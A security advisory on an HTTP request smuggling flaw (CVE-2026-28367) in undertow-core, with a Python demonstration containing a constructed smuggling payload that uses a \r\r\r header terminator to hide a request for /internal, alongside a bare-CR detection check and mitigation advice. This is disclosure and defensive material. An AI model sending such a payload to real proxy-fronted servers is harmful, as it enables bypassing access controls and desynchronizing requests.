AIKIDO-2026-10532

undertow-core is vulnerable to Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVE-2026-28367
Published Apr 24, 2026

Score: 87 (High Risk)

This affects:

Java: undertow-core
Versions 0.0.1 - 2.3.24.Final

TL;DR

A flaw was found in Undertow where a remote attacker could terminate the HTTP header block using \r\r\r instead of the standard CRLF CRLF delimiter. A front-end proxy that does not recognise \r\r\r as the end of the headers forwards the bytes as a single request, while Undertow treats everything after \r\r\r as a new request. In environments using certain proxy servers, including older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, this could enable HTTP request smuggling, potentially resulting in unauthorized access, request desynchronization, or manipulation of downstream web requests.
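To make the desynchronization concrete, the following is an added illustration and not code from Undertow or from this advisory. It runs two header-block splitters over one constructed byte stream: a strict splitter that ends headers only at CRLF CRLF (what a conforming front end does), and a hypothetical lenient splitter that additionally accepts \r\r\r, standing in for the behaviour the advisory attributes to Undertow (the real parser logic is not reproduced here). The same bytes yield one request under the strict rule and two under the lenient rule, and the second request never passed through whatever access checks the front end applies to request lines. A small helper also flags a bare CR inside the header block, which is the check a proxy or WAF can apply: RFC 9112 section 2.2 requires a bare CR in a header field to be rejected or replaced with SP, and either treatment prevents the back end from ever seeing the \r\r\r sequence.

```python
import re

# Constructed sample payload (not a capture): one TCP segment as an attacker
# might send it through a front-end proxy that forwards bare CRs untouched.
CONSTRUCTED_PAYLOAD = (
    b"GET /public HTTP/1.1\r\n"
    b"Host: app.example\r\r\r"        # non-standard terminator described by the advisory
    b"GET /internal HTTP/1.1\r\n"     # request line that only the lenient parser sees
    b"Host: app.example\r\n"
    b"\r\n"
)

# Conforming end-of-headers marker (RFC 9112).
STRICT_TERMINATOR = re.compile(rb"\r\n\r\n")
# Hypothetical lenient marker modelling the advisory's description: the
# standard delimiter or a bare "\r\r\r". This is an assumption for the demo,
# not Undertow's actual parser code.
LENIENT_TERMINATOR = re.compile(rb"\r\n\r\n|\r\r\r")


def split_requests(data: bytes, terminator: re.Pattern) -> list:
    """Split one byte stream into requests, ending each header block at the
    first match of `terminator`. Bodies are sized by Content-Length; a request
    without one is treated as having no body (enough for GET-only samples)."""
    requests = []
    pos = 0
    while pos < len(data):
        match = terminator.search(data, pos)
        if match is None:
            break  # incomplete header block: a real server would wait for more bytes
        head = data[pos:match.start()]
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode("ascii", "replace")] = value.strip()
        length = int(headers.get("content-length", b"0").decode("ascii", "replace"))
        body_start = match.end()
        requests.append({
            "request_line": lines[0].decode("ascii", "replace"),
            "headers": headers,
            "body": data[body_start:body_start + length],
        })
        pos = body_start + length
    return requests


def has_bare_cr_in_headers(data: bytes) -> bool:
    """Proxy/WAF-side check: is there a CR not followed by LF anywhere in the
    header block as a conforming parser would delimit it? RFC 9112 section 2.2
    requires such a bare CR to be rejected or replaced with SP; either choice
    keeps a "\\r\\r\\r" sequence from reaching the back end intact."""
    match = STRICT_TERMINATOR.search(data)
    head = data if match is None else data[:match.start()]
    return re.search(rb"\r(?!\n)", head) is not None


if __name__ == "__main__":
    strict = split_requests(CONSTRUCTED_PAYLOAD, STRICT_TERMINATOR)
    lenient = split_requests(CONSTRUCTED_PAYLOAD, LENIENT_TERMINATOR)
    print("front end (strict) sees", len(strict), "request(s):",
          [r["request_line"] for r in strict])
    print("back end (lenient) sees", len(lenient), "request(s):",
          [r["request_line"] for r in lenient])
    print("bare CR in header block:", has_bare_cr_in_headers(CONSTRUCTED_PAYLOAD))
```

Under the strict rule the whole payload is one request whose Host header carries stray CRs; under the lenient rule the bytes after \r\r\r become a second request for /internal. The `has_bare_cr_in_headers` check is the one to test against your own front end: if it forwards such a payload unchanged, the proxy-side precondition for this flaw is met.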

Who does this affect?

You are affected if you are using a version that falls within the vulnerable range. Exploitation additionally requires a front-end proxy or load balancer that forwards a header block containing bare CR characters to Undertow unchanged; a front end that rejects or normalizes bare CR, as RFC 9112 requires, does not deliver the \r\r\r sequence and so does not create the desynchronization.

Background info

undertow-core is vulnerable to Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in versions 0.0.1 - 2.3.24.Final.

How to fix this

There is no fixed release available yet, but there are PRs ready to merge and the fix will probably be released in version 2.4.0. Until you can upgrade, verify how your front-end proxy handles bare CR in request headers rather than relying on the version range alone, since the smuggling path depends on the proxy forwarding the malformed header block.